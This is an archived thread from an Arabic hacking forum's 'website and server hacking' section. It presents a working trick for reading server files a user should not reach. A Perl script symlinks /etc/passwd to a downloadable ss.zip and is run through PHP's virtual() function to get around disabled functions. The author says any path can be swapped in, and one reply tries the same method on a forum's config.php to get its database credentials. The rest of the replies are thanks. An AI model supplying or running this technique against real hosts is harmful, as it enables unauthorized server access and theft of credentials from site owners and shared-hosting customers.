:: vBspiders Professional Network ::
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   [حصريآ]تشغيل البيرل بأحد دوال php (http://www.vbspiders.com/vb/t31221.html)

S4udi h4ck 06-12-2010 05:28 AM
[حصريآ]تشغيل البيرل بأحد دوال php
 
1 مرفق
السلام عليكم ورحمة الله وبركاته

كيف الحال ياعيال إن شاء الله بخير ...

 دالة virtual

هالطريقه نادر اللي يعرفها ويمكن محد فكر فيها و الطريقه من اكتشافي و استنتاجي

طبعاً راح نشغل البيرل ليس مثل ملف cgi-telnet او اي شيل ثاني بالبيرل

 هالدالة تشغل اي كود بيرل يطبع امر ماء على الصفحة وهو طبعاً يستفاد بالسيرفر لتنسيق html

لأصحاب تطوير المواقع و برمجة السكربتات ونادر بالمره انك تلقى سيرفرات حاطه الدالة من ضمن

الدوال الغير مفعله ...

راح اعطيكم كود تضعونه بملف بيرل


كود PHP:
[html] #!/usr/bin/perl -w


$target="/etc/passwd";


$distension ="ss.zip";


print "Content-type: ****/html\n\n";


print '<**** ****="#C0C0C0" bgcolor="#000000">';


$symlink = symlink($target,$distension);


if($symlink == 1) { print " $distension Symlink Created Successfully . . ."; }


else { print "Cannot Symlink File or File $distension Already Exists[/html] . . ."; }




زي ماهو مبين بكود البيرل أنه راح ينشىء اختصار عن طريق Symlink

لملف /etc/passwd بملف اسمه ss.zip

ترفعه على السيرفر وطبعاً اعطاءه تصريح 755 وعطيناه اسم ss.pl

وتنشأ ملف php بإستخدام دالة virtual

 كود PHP:
<?php


virtual("./ss.pl");


?>

ارفع ملف الـ php على نفس مسار ملف البيرل

وافتحه من المتصفح وراح يجيك نفس اللي بهالصوره

http://www.mlfnt.com/up_6_2010/12763114361.jpg

راح يقول

ss.zip Symlink Created Successfully

حمل ملف ss.zip وافتحه عن طريق المفكره (Notepad) وراح تلقى محتوى /etc/passwd

الملف في المرافقه

بإمكانك تغير المسار إلى اي مسار اخر تبي تقرأه على السيرفر ...

و أيضاً تستطيع إستعمال دوال اخرى للبيرل ...

و إن شاء الله يكون الشرح مفهوم للجميع ..

أهداء الي منظمة : kala$nikoV
smilies15

و بالتوفيق ...
G0D-FaTH3R

KaLa$nikoV 06-12-2010 05:51 AM
مشكور ع الشرح الرائع

من بعد اذنك اسمح لي باضافه


(الشرح هو تخطي عباره عن عمليه سحب ملفات ع السيرفر من خلال
دوال لغه perl )

شكرا ع الاهداء والشرح

++ تقيم

z3r0 b0mb3r 06-12-2010 03:08 PM
مشكورررررررررررررررررررررررررررررررر أخي بارك الله فيك
لك مني أجمل تحية

H3x HaCkeR 06-12-2010 04:23 PM
]يعطيك العافيه

معاني الفراق 06-15-2010 02:09 PM
يابطل واصل مجهودك

Xa7m3d 06-17-2010 06:45 PM
مشكور يالغالي وتم التجربة بنجاح لكن اخي اسمحلي اصحح العنوان لانو مفهوم الفكرة لا ينطبق ع العنوان بمعنى مش انك تشغل البيرل نفسه من خلال هالدالة فقط هو انك تسحب ملفات من السرفر لايمكن قرائته وهده شغلة يمكن نستفيد منها احيانا مشكور مجدداا وبالتوفيق للجميع

Multi_Hacker 07-20-2010 01:06 PM
مشكووور اخوي

لا تحرمنا من ابداعك

اخوك Multi_Hacker

Net-B0x 08-07-2010 12:59 PM
مشكور جزاك الله خيرا

hack!n9 08-11-2010 07:21 PM
الف مشكوور يا غالي عل كل شيا

cisco_security 08-12-2010 11:40 PM
شكرا لك يا غالي

دحمان39 09-30-2010 08:44 PM
جزاك الله الفردوس الاعلى

GNGR1 10-04-2010 11:36 AM
يعطيك العافيه يا خلفهم

Th3 M4RoC4in GhOsT 10-29-2010 12:08 AM
مشكور اخي الغالي حبيت أسالك سؤال يعني حطيت بدل امر etc/passwd
امر نسخ ln بعدين حطيت مسار الكونفق هيك
ln /home/xxx/public_html/vb/includes/config.php
لكن للاسف طلع خطأ
ياريت لو عندك افادة الله يجازيك كل خير

عصام-محمد 10-30-2010 11:07 AM
بارك الله فيكم

Dr.jmjmah 10-31-2010 11:53 PM
مششششكورَ , والله مبـــدع وكلمة مبـدع قليله فيك
ولاهنت علىآ الشششرح الـوـواضضضح ,
وسسلمت يدك علىآ هيـك موضوع مميزَ


الساعة الآن 09:16 AM
صفحة 1 من 3 1 23
عرض 40 مشاركات من هذا الموضوع لكل صفحة


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0